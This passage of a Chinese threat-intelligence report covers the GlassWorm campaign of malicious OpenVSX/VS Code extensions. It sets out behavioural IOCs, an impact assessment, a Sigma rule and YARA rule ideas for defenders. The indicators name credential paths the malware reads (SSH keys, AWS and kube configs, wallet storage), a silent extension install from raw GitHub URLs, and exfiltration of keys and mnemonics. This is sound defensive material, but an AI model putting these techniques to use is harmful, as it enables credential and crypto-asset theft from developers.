break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">高</span></strong><p><span leaf="">。熟练掌握跨平台编译（Zig/C++）、JS 混淆工程、供应链分发机制、市场审核规避策略。采用&#34;瘦加载器+动态拉取&#34;架构，体现对现代端点检测（EDR）与静态沙箱的深刻认知。</span></p></td></tr><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">目标画像</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">全栈开发者、DevOps 工程师、开源贡献者、加密资产持有者。偏好使用 VS Code/OpenVSX 生态，对扩展更新缺乏深度审计习惯。</span></p></td></tr><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">历史活动轨迹</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2024年10月首次曝光 → 2025年横向渗透至 npm/GitHub/macOS → 2026年3月（72包）测试&#34;休眠&#34;策略 → 2026年4月（73包）规模化部署并引入原生模块。攻击半径持续扩大，隐蔽性呈指数级提升。</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">五、IOC 深度分析</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">由于 GlassWorm 采用动态载荷与高频更新策略，传统静态 IOC（固定 Hash/IP）生命周期极短（通常 &lt;72 小时）。本次分析聚焦 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">行为型与环境型 IOC</span></strong><span leaf="">，更适用于企业级威胁狩猎：</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">1. 扩展元数据异常</span></h3><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">发布者标识不匹配</span></strong><p><span leaf="">扩展包 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">publisher</span></code><span leaf=""> 字段与 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">displayName</span></code><span leaf="">/</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">icon</span></code><span leaf=""> 不一致，或与官方同名扩展的 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">unique identifier</span></code><span leaf=""> 存在细微差异。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">GitHub 仓库掩护特征</span></strong><p><span leaf="">托管载荷的 GitHub 账户注册日期 &lt; 90 天，仓库数量 ≤ 2，无 Star/Fork 互动，仅包含 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">.vsix</span></code><span leaf=""> 或编译产物。</span></p></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2. 运行时行为指纹</span></h3><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">CLI 静默安装</span></strong><p><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">node</span></code><span leaf=""> 或 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">extensionHost</span></code><span leaf=""> 进程执行 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">code --install-extension <a href="https://raw.githubusercontent.com/..." target="_blank">https://raw.githubusercontent.com/...</a></span></code><span leaf=""> 或类似下载+安装命令序列。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">原生模块异常加载</span></strong><p><span leaf="">非 Node.js 项目目录中出现 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">.node</span></code><span leaf=""> 文件，且由 IDE 扩展进程 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">dlopen()</span></code><span leaf=""> 加载；该模块导出函数包含文件系统遍历或网络请求逻辑。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">高熵混淆特征</span></strong><p><span leaf="">扩展主 JS 文件包含超长 Base64/Hex 编码块、动态字符串拼接、</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">atob()</span></code><span leaf="">/</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">Buffer</span></code><span leaf=""> 滥用，且无合法业务逻辑对应。</span></p></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">3. 目标访问行为</span></h3><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">非常规进程读取敏感目录</span></strong><p><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">extensionHost</span></code><span leaf=""> 或子进程访问 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">~/.ssh/id_*</span></code><span leaf="">, </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">~/.aws/</span></code><span leaf="">, </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">~/.kube/config</span></code><span leaf="">, 浏览器扩展存储路径（如 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">Default/Local Extension Settings</span></code><span leaf="">）。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">隐蔽外传流量</span></strong><p><span leaf="">IDE 进程向非官方域名发起 HTTPS POST，内容包含 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">Authorization</span></code><span leaf="">、</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">PRIVATE_KEY</span></code><span leaf=""> 或 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">mnemonic</span></code><span leaf=""> 等关键字段（需结合网络代理日志）。</span></p></li></ul><blockquote style="overflow-wrap: break-word;font-style: normal;padding: 1em;border-left: 4px solid rgb(156, 163, 175);border-radius: 6px;color: rgb(75, 85, 99);background: rgb(243, 244, 246);margin-bottom: 1em;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><p style="overflow-wrap: break-word;margin: 0px;letter-spacing: 0.1em;color: rgb(75, 85, 99);word-break: break-all;hyphens: auto;display: block;font-size: 1em;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">狩猎建议</span></strong><span leaf="">：在 EDR 中配置基于进程树与文件访问的关联规则；在流量侧对 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">code</span></code><span leaf=""> 进程的非市场域名出站连接进行 TLS SNI 或 JA3 指纹监控。</span></p></blockquote><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">六、影响评估</span></h2><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);border-collapse: collapse;margin: 1em 8px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><thead><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">评估维度</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">详细分析</span></p></th></tr></thead><tbody><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">影响范围</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">OpenVSX 作为 Eclipse Theia、Gitpod、GitLab Web IDE 及部分 JetBrains 插件的底层注册中心，其污染可间接波及多家企业级开发平台与云 IDE 服务商。</span></p></td></tr><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">业务风险</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">高危</span></strong><p><span leaf="">。开发者环境拥有生产级权限（CI/CD Token、云控制台、代码仓库 Write 权限）。凭证泄露将直接导致供应链下游投毒、云资源劫持、源代码窃取或加密资产归零。</span></p></td></tr><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">行业靶点</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">软件开发、金融科技/区块链、云原生企业、开源基金会、外包开发团队。加密货币开发者与 Web3 项目贡献者为高优先级目标。</span></p></td></tr><tr style="overflow-wrap: break-word;"><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">暴露面扩大因素</span></strong></td><td align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">&#34;休眠&#34;策略导致大量已安装扩展成为定时炸弹；开发者普遍缺乏扩展版本回滚与差异审计习惯；部分企业未对 IDE 实施网络隔离或扩展白名单策略。</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">七、检测与响应建议</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">1. 检测规则思路</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Sigma 规则示例（进程与 CLI 监控）</span></strong><span leaf="">：</span></p><pre style="overflow-wrap: break-word;background: rgb(246, 248, 250);padding: 1em;border-radius: 8px;overflow-x: auto;margin: 10px 8px;word-break: break-all;white-space: pre-wrap;max-width: 100%;color: rgb(43, 48, 59);font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(51, 51, 51);background: none;padding: 0px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">title: IDE Extension Host Spawning VSIX Installer via GitHub</span><span leaf=""><br/></span><span leaf="">logsource: process_creation</span><span leaf=""><br/></span><span leaf="">detection:</span><span leaf=""><br/></span><span leaf="">  selection:</span><span leaf=""><br/></span><span leaf="">    ParentImage|endswith: &#39;node.exe&#39;  # 或 code-insiders/node/extensionHost</span><span leaf=""><br/></span><span leaf="">    Image|endswith: &#39;code.exe&#39;</span><span leaf=""><br/></span><span leaf="">    CommandLine|contains|all:</span><span leaf=""><br/></span><span leaf="">      - &#39;--install-extension&#39;</span><span leaf=""><br/></span><span leaf="">      - &#39;github.com&#39;</span><span leaf=""><br/></span><span leaf="">      - &#39;raw.githubusercontent.com&#39;</span><span leaf=""><br/></span><span leaf="">  condition: selection</span><span leaf=""><br/></span><span leaf="">level: high</span></code></pre><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">YARA 规则思路（混淆 JS 与 .node 特征）</span></strong><span leaf="">：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">扫描高熵字符串块（</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">entropy &gt; 6.5</span></code><span leaf="">）+ 动态执行关键字（</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">eval|Function|vm.runInThisContext</span></code><span leaf="">）+ 网络请求库调用（</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">axios|node-fetch|https.request</span></code><span leaf="">）。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">扫描 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">.node</span></code><span leaf=""> 模块的 ELF/PE 头，匹配特定节区名称（如 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">.rsrc</span></code><span leaf=""> 中隐藏配置）或导出符号表包含 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">steal</span></code><span leaf="">, </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: 